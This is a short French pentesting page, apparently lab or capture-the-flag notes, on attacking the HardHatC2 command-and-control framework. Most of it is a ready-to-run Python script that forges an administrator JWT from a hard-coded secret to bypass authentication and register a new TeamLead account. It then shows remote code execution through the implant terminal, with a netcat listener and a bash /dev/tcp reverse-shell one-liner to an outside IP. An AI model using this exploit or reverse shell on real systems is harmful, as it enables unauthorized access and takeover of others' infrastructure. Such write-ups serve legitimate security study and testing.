Port 7096 - Pentesting HardHatC2

HardHatC2 est un framework de commande et contrôle (C2) multi-utilisateurs basé sur C# et .NET, conçu pour faciliter les engagements des équipes rouges et les tests d'intrusion. Il comprend principalement un serveur d'équipe ASP.NET, un client Blazor .NET et des implants intégrés en C#, avec la possibilité de prendre en charge des implants tiers dans d'autres langages.

Bypass d'authentification HardHat C2 :

HardHatC2 0-Days (RCE & AuthN Bypass)Medium

Nous utilisons le script suivant pour contourner l'authentification et créer un nouvel utilisateur :

import jwt  
import datetime  
import uuid  
import requests  
  
rhost = '127.0.0.1:5000'  
  
# Craft Admin JWT  
secret = "jtee43gt-6543-2iur-9422-83r5w27hgzaq"  
issuer = "hardhatc2.com"  
now = datetime.datetime.utcnow()  
  
expiration = now + datetime.timedelta(days=28)  
payload = {  
"sub": "HardHat_Admin",  
"jti": str(uuid.uuid4()),  
"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier": "1",  
"iss": issuer,  
"aud": issuer,  
"iat": int(now.timestamp()),  
"exp": int(expiration.timestamp()),  
"http://schemas.microsoft.com/ws/2008/06/identity/claims/role": "Administrator"  
}  
  
token = jwt.encode(payload, secret, algorithm="HS256")  
print("Generated JWT:")  
print(token)  
  
# Use Admin JWT to create a new user 'sth_pentest' as TeamLead  
burp0_url = f"https://{rhost}/Login/Register"  
burp0_headers = {  
"Authorization": f"Bearer {token}",  
"Content-Type": "application/json"  
}  
burp0_json = {  
"password": "jordan12345",  
"role": "TeamLead",  
"username": "jordan"  
}  
r = requests.post(burp0_url, headers=burp0_headers, json=burp0_json, verify=False)  
print(r.text)

Le script génère l'utilisateur jordan avec le rôle TeamLead.

Hardhat C2 (RCE)

Sur la partie ImplantInteract, nous avons accès à un terminal. En exécutant la commande whoami, nous voyons que nous sommes connectés en tant qu'utilisateur sergej.

Nous établissons une reverse shell pour l'utilisateur sergej en écoutant sur le port 443 :

nc -nlvp 443

Et exécutons la commande suivante pour établir la connexion inversée

bash -c "bash -i >& /dev/tcp/10.10.14.163/443 0>&1"

Mis à jour il y a 1 an

hashtagBypass d'authentification HardHat C2 :

hashtagHardhat C2 (RCE)

Bypass d'authentification HardHat C2 :

Hardhat C2 (RCE)